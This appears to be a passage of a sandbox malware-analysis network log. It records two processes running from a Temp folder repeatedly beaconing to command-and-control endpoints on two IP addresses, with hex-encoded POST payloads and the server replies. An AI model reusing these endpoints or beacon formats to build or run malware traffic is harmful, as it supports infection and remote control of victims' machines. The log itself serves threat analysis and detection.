Jul 26, 2024 17:57:42.881117105 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:43.133012056 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	61304	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:42.956870079 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:43.733155966 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:43.733922005 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:43.990942001 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	61305	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:43.286972046 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:44.092398882 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:44.098217010 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:44.588438988 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 17:57:44.589577913 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	61306	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:44.205043077 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:44.946010113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:44.987618923 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:45.234344959 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	61307	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:45.080146074 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:45.866900921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:45.916829109 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:46.179433107 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	61312	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:45.716661930 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:46.429071903 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:46.451519966 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:46.701339006 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	61320	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:46.347423077 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:47.280132055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:47.281049967 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:47.533428907 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	61321	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:46.897916079 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:47.777976990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:47.778870106 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:48.025218964 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	61327	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:47.649416924 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:48.421948910 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:48.479199886 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:48.724925995 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	61329	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:48.138472080 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:48.902156115 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:48.909152031 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:49.184959888 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	61332	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:48.863043070 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:49.651585102 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:49.653000116 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:50.183908939 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 17:57:50.191401958 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	61334	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:49.339245081 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:50.191370010 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:50.273186922 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:50.520705938 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	61342	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:50.374094009 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:51.125698090 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
